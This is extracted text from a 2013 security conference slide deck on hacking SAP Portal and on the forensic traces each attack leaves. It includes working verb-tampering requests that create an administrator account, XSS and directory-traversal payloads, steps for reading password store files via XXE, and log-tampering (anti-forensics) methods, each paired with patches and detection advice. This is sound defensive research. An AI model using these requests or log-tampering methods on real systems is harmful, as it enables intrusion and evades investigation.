SAP Portal Hacking and Forensics at Confidence 2013

8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013

1/88

Invest in security

to secure investments

SAP Portal: Hacking and forensicsDmitry Chastukhin Director of SAP pentest/research team

Evgeny Neyolov Security analyst, (anti)forensics research


2/88

ERPScan

Leading SAP AG partner in the field of discovering security

vulnerabilities by the number of found vulnerabilities

Developing software for SAP security monitoring

Talks at 35+ security conferences worldwide: BlackHat

(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.

First to develop software for NetWeaver J2EE assessment

The only solution to assess all areas of SAP Security Research team with experience in different areas of security

from ERP and web security to mobile, embedded devices, and

critical infrastructure, accumulating their knowledge on SAP

research.

2erpscan.com ERPScan invest in security to secure investments


3/88

Dmitry Chastukhin

Business application security

expert

Yet another security

researcher



4/88

Agenda

SAP security

SAP forensics WTF?!

Say hello to SAP Portal

Breaking SAP Portal

Catch me if you can

Conclusion



5/88

SAP

The most popular business application More than 180000 customers worldwide

More than 70% of Forbes 500 run SAP

More than 40% of ERP market in Poland



6/88

SAP security

Espionage Stealing financial information

Stealing corporate secrets

Stealing supplier and customer lists

Stealing HR data

Fraud False transactions

Modification of master data

Sabotage

Denial of service

Modification of financial reports

Access to technology network (SCADA) by trust relations



7/88

0

5

10

15

20

25

30

35

2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013

SAP security

BlackHat

Defcon

HITB

RSA

CONFidence

DeepSec

Hacktivity

Troopers

Source

Source: SAP Security in Figures 2013

LINK

http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdfhttp://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf


8/88


More than 2600 in total

How easy? SAP Security Notes


9/88

Is it remotely exploitable?

> 5000 non-web SAP services exposed in the world

including Dispatcher, Message server, SapHostControl, etc.


sapscan.com


10/88

What about other services?

0

1

2

3

4

5

6

7

8

9

SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd

World



11/88

What about unpublished threats?

Companies are not interested in publishing information abouttheir breaches

There are a lot of internal breaches thanks to unnecessarily

given authorizations (An employee by mistake buys hundreds of

excavators instead of ten)

There are known stories about backdoors left by developers in

custom ABAP code

How can you be sure that, if a breach occurs, you can find

evidence?



12/88

If there are no attacks, it doesnt mean anything

Companies dont like to share it

Companies dont use security audit ~10%

Even if used, nobody manages it ~5%

Even if managed, no correlation ~1%

SAP Forensics

erpscan.com 12ERPScan invest in security to secure investments


13/88

Typical SAP audit options

ICM log icm/HTTP/logging_0 70% Security audit log in ABAP 10%

Table access logging rec/client 4%

Message Server log ms/audit 2%

SAP Gateway access log 2%

* The percentage of companies is based on our security assessments and product

implementations.



14/88

What do we see?

A lot of research Real attacks

Lack of logging practice

Many vulnerabilities are hard to close We need to monitor

them, at least



15/88

What do we need to monitor?

External attacks on SAP

Attack users and SAP GUI

SAP Portal and WEB

Exposed SAP services

SAProuter

* Ideally, we should control everything, but this talk has limits, so lets focus onthe most critical areas.

Awareness

Secure configuration and patch management

Disable them

Too much issues and custom

configuration

Can be 0-days

Need to concentrate on this area



16/88

Point of web accessto SAP systems

Point of web access to

other corporate systems

Way for attackers

to get access to SAP

from the Internet

Say hello to Portal



17/88

EP architecture



18/88

Okay, okay. SAP Portal is important, andit has many links to other modules.

So what?



19/88

SAP Logging

erpscan.com 19

If you are running an ABAP + Java installation of Web AS withSAP Web Dispatcher as a load balancing solution, you can safely

disable logging of HTTP requests and responses on J2EE Engine,

and use the corresponding CLF logs of SAP Web Dispatcher. This

also improves the HTTP communication performance. The only

drawback of using the Web Dispatchers CLF logs is that no

information is available about the user executing the request

(since the user is not authenticated on the Web Dispatcher, but

on the J2EE Engine instead).

SOURCE: SAP HELP

*Not the only. There are many complex attacks with POST requests.

ERPScan

invest in security to secure investments
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htmhttp://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm


20/88

SAP J2EE Logging

erpscan.com 20

Categories of system events recording: System all system related security and administrative logs

Applications all system events related to business logic

Performance reserved for single activity tracing

Default location of these files in your file system:\usr\sap\\\j2ee\cluster\\log\

ERPScan



21/88

SAP J2EE Logging

erpscan.com 21

The developer trace files of the Java instance\\work

The developer trace files of the central services

\\work\\log

Java server logs

\\j2ee\cluster\server\log

ERPScan



22/88

Full logging is not always the best option

erpscan.com 22ERPScan



23/88

SAP Management Console




24/88


SAP MMC: centralized system management SAP MMC has remote commands

Commands are simple SOAP requests

Allowing to see the trace and log messages

Its not bad if you only use it sometimes and delete logs afteruse, but




25/88


erpscan.com 25

What can we find in logs?

Right!

The file userinterface.log contains calculated JSESIONID

But

The attacker must have credentials to read the log file

WRONG!

ERPScan



26/88


true

j2ee/cluster/server0/log/system/userinterface.log

%COUNT%

EOF




27/88

Prevention

LINK to SAP HELP

Dont use TRACE_LEVEL = 3

Delete traces when work is finished Limit access to dangerous methods

Install notes 927637 and 1439348

Mask security-sensitive data in HTTP access log


http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htmhttp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm


28/88

Prevention

LINK to SAP HELP

erpscan.com 28

The HTTP Provider service can mask security-

sensitive URL parameters, cookies, or headers

By default, only for the headers listed below

Path Parameter: jsessionid

Request Parameters: j_password, j_username,

j_sap_password, j_sap_again, oldPassword,

confirmNewPassword,ticket

HTTP Headers: Authorization, Cookie (JSESSIONID,

MYSAPSSO2)

ERPScan

http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htmhttp://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm


29/88

SAP NetWeaver J2EE




30/88

Access Control

Web Dynpro - programmatic

Portal iViews - programmatic

J2EE Web apps - declarative



ProgrammaticBy UME

DeclarativeBy WEB.XML


31/88


32/88

web.xml

CriticalActioncom.sap.admin.Critical.Action

CriticalAction


33/88

Verb Tampering

If we are trying to get access to an application using GET weneed a login:pass and administrator role

What if we try to get access to application using HEAD instead

GET?

PROFIT!

Did U know about ctc?




34/88

Verb Tampering

Need Admin account in SAP Portal?

Just send two HEAD requests

Create new user CONF:idence

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence

Add the user CONF to the group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators

* Works when UME uses JAVA database.




35/88

Install SAP notes 1503579, 1616259, 1589525,

1624450

Install other SAP notes about Verb Tampering

Scan applications with ERPScan WEB.XML

checker

Disable the applications that are not necessary

Prevention




36/88

Investigation



[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14: GET/ctc/ConfigServlet HTTP/1.1 4011790

[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14

: HEAD/ctc/ConfigServlet HTTP/1.1 2000

[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14

: HEAD

/ctc/ConfigServlet?param=com.sap.ctc.util.Use

rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 2000

j2ee\cluster\\log\system\httpaccess\responses.trc


37/88

web.xml

CriticalActioncom.sap.admin.Critical.Action

CriticalAction


38/88

Invoker Servlet

Want to execute an OS command on J2EE server remotely? Maybe upload a backdoor in a Java class?

Or sniff all traffic?

Still remember ctc?




39/88

Invoker Servlet




40/88

Prevention



Update to the latest patch 1467771, 1445998

EnableInvokerServletGlobally must be false

Check all WEB.XML files with ERPScan WEBXML

checker


41/88

Investigation

erpscan.com 41

#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa

p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA

Transaction :

[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A

pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut

il.SecurityAudit#Plain###Guest | USER.CREATE |

USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:uniquename=[CONF]#

#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420

62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service

s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000

c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.

sap.engine.services.security.roles.audit#Java###{0}:

Authorization check for caller assignment to J2EE security role

[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#

ERPScan



42/88

Investigation




43/88

XSS

Many XSSs in Portal

But sometimes HttpOnly

But when we exploit XSS, we can use the features of SAP Portal



EPCF


44/88

EPCF

EPCF provides a JavaScript API designed for the client-side

communication between portal components and the portal core

framework

Enterprise Portal Client Manager (EPCM)

iViews can access the EPCM object from every portal pageor IFrame

Every iView contains the EPCM object

alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");



For example, EPCF used for transient user data buffer for iViews


45/88

Prevention

Install SAP note 1656549




46/88

#Plain###192.168.192.26 : GET/irj/servlet/prt/portal/prtroot/com.sap.porta

l.usermanagement.admin.UserMapping?systemid=M

S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(

%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#

j2ee\cluster\\log\system\httpaccess\res

ponses.trc

Investigation




47/88

Web Dynpro unauthorized modifications

For example:

somebody steals an account using XSS/CSRF/Sniffing

then tries to modify the severity level of logs

Web Dynpro JAVA




48/88

Web Dynpro JAVA

LINK to SAP HELP


http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htmhttp://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm


49/88

No traces of change in default log files

\cluster\server0\log\system\httpaccess\responses.log

Web Dynpro sends all data by POST, and we only see GET URLs inresponses.log But sometimes we can find information by indirect signs

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET/webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigur

ator/warning.gif HTTP/1.1 200 110

The client loaded images from the server during some changes

Investigation




50/88

Investigation



Most actions have icons

They have to be loaded from the server

Usually, legitimate users have them all in cache

Attackers usually dont have them, so they make requests to the

server Thats how we can identify potentially malicious actions

But there should be correlation with a real users activity

False positives are possible:

New legitimate user Old user clears cache

Other


51/88

Directory traversal

FIX




52/88

Directory traversal fix bypass




53/88

Prevention





54/88

Investigation



/../

!252f..!252f


55/88

Breaking SAP Portal

Found a file in the OS of SAP Portal with the encrypted

passwords for administration and DB

Found a file in the OS of SAP Portal with keys to decrypt

passwords

Found a vulnerability (another one ;)) which allows reading the

files with passwords and keys

Decrypt passwords and log into Portal

PROFIT!




56/88


57/88


58/88

XXE in Portal




59/88

XXE in Portal




60/88

XXE

Error based XXE



l l


61/88

XXE in Portal: Result

We can read any file

Including config with passwords

The SAP J2EE Engine stores the database user SAPDB; its

password is here:\usr\sap\\SYS\global\security\data\SecStore.properties



Where are the passwords?


62/88

rdbms.maximum_connections=5

system.name=TTT

secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.key

secstorefs.secfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.propertiessecstorefs.lib=/oracle/TTTsapmnt/global/security/lib

rdbms.driverLocation=/oracle/client/10x_64/instantclie

nt/ojdbc14.jar

rdbms.connection=jdbc/pool/TTT

rdbms.initial_connections=1


(config.properties)





63/88


system.name=TTT


data/SecStore.key




nt/ojdbc14.jar




(config.properties)



S St ti


64/88

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx

admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu

eur2445yxgBS

admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq

Dp+QD04b0Fh

jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH

admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr

4ZUgRTQ

$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt

$internal/mode=encryptedadmin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7

5eC6/5S3E

SecStore.properties

But where is the key?



fi ti


65/88


system.name=TTT


data/SecStore.key




nt/ojdbc14.jar



config.properties



G t th d


66/88

Get the password

We have an encrypted password

We have a key to decrypt it

We got the J2EE admin and JDBC

login:password!



P ti


67/88

Prevention

erpscan.com 67


Restrict read access to files SecStore.propertiesand SecStore.key

ERPScan


Investigation


68/88

Investigation

erpscan.com 68

POST

/irj/servlet/prt/portal/prteventname/HtmlbE

vent/prtroot/pcd!3aportal_content!2fadminis

trator!2fsuper_admin!2fsuper_admin_role!2fc

om.sap.portal.content_administration!2fcom.

sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplore

r!2fcom.sap.km.AdminExplorer/ HTTP/1.1

ERPScan


Investigation


69/88

Investigation

The only one way to get HTTP POST request values is to enable

HTTP Trace

Visual Administrator Dispatcher HTTP Provider

Properties: HttpTrace = enable

For 6.4 and 7.0 SP12 and lower:

On Dispatcher:

/j2ee/cluster/dispatcher/log/defaultTrace.trc

On Server

\j2ee\cluster\server0\log\system\httpaccess\responses.0.trc

For 7.0 SP13 and higher:

/j2ee/cluster/dispatcher/log/services/http/req_resp.trc

Manually analyze all requests for XXE attacks



Malicious file upload: Attack


70/88


Knowledge management allows uploading to the server

different types of files that can store malicious content

Sometimes, if guest access is allowed, it is possible to upload

any file without being an authenticated user

For example, it can be an HTML file with JavaScript that steals

cookies





71/88






72/88




Malicious file upload: Forensics


73/88

Malicious file upload: Forensics

[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST

/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt

root/pcd!3aportal_content!2fspecialist!2fcontentman

ager!2fContentManager!2fcom.sap.km.ContentManager!2

fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc

Explorer!2fcom.sap.km.DocsExplorer/documents

HTTP/1.1 200 13968[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET

/irj/go/km/docs/etc/public/mimes/images/html.gif

HTTP/1.1 200 165

*Again, images can help us.



Malicious file upload: Prevention


74/88


erpscan.com 74

Enable File Extension and Size Filter:

System Administration System Configuration

Content Management Repository Filters ShowAdvanced Options File Extension and Size Filter

Select either theAll repositories parameter or at least

one repository from the repository list in

the Repositories parameter

ERPScan




75/88


erpscan.com 75

Enable Malicious Script Filter:

System Administration System Configuration

Content Management Repository Filters Show

Advanced Options Malicious Script Filter The filter also detects executable scripts in files that are

being modified and encodes them when they are saved

enable Forbidden Scripts. Comma-separated list of banned

script tags that will be encoded when the filter is applied

enable the Send E-Mail to Administrator option

ERPScan


Portal post-exploitation


76/88


Lot of links to other systems in corporate LAN

Using SSRF, attackers can get access to these systems

What is SSRF?



SSRF History: Basics


77/88

We send Packet A to Service A

Service A initiates Packet B to service B

Services can be on the same or different hosts

We can manipulate some fields of packet B within packet A

Various SSRF attacks depend on how many fields we can controlon packet B

SSRF History: Basics

Packet A

Packet B



Partial Remote SSRF:


78/88

HTTP attacks on other services

HTTP ServerCorporate

network

Direct attack

GET /vuln.jsp

SSRF Attack

SSRF Attack

Get /vuln.jst

A B



Gopher uri scheme


79/88

Gopher uri scheme

Using gopher:// uri scheme, it is possible to send TCP

packets Exploit OS vulnerabilities

Exploit old SAP application vulnerabilities

Bypass SAP security restrictions

Exploit vulnerabilities in local services

More info in our BH2012 presentation:SSRF vs. Business Critical Applications

LINK



http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf


80/88

Portal post exploitation




81/88

Anti-forensics



Anti-forensics


82/88

Anti forensics

Flooding

Deleting

Changing



Anti-forensics


83/88

Anti forensics

Log flooding

5 active logs

Maximum log file size is 10 Mb

Archiving when all logs reach the maximum size

If file.0.log -> max size then open file.1.log If file.4.log -> max size then zip all and backup

Rewriting the same files after archiving



Anti-forensics


84/88

Anti forensics

Log deleting

SAP locks write access to the only one active log

SAP allows reading/writing logs, so it is possible to delete them

It could compromise the attackers presence

Log changing

SAP locks write access only to the one active log

It is possible to write into any other log file



Securing SAP Portal


85/88

g

Patching

Secure configuration

Enabling HTTP Trace with masking

Malicious script filter

Log archiving Additional place for log storage

Monitoring of security events

Own scripts, parse common patterns

ERPScan has all existing web vulns/0-day patterns




86/88

Future work


87/88

I'd like to thank SAP's Product Security Response Team for the

great cooperation to make SAP systems more secure. Research

is always ongoing, and we can't share all of it today. If you want

to be the first to see new attacks and demos, follow us at

@erpscan and attend future presentations:

July 31 BlackHat (Las Vegas, USA)




88/88

Web:

www.erpscan.com

e-mail: [email protected]

Twitter:

@erpscan

@_chipik

@neyolov

SAP Portal Hacking and Forensics at Confidence 2013

Documents

Transcript of SAP Portal Hacking and Forensics at Confidence 2013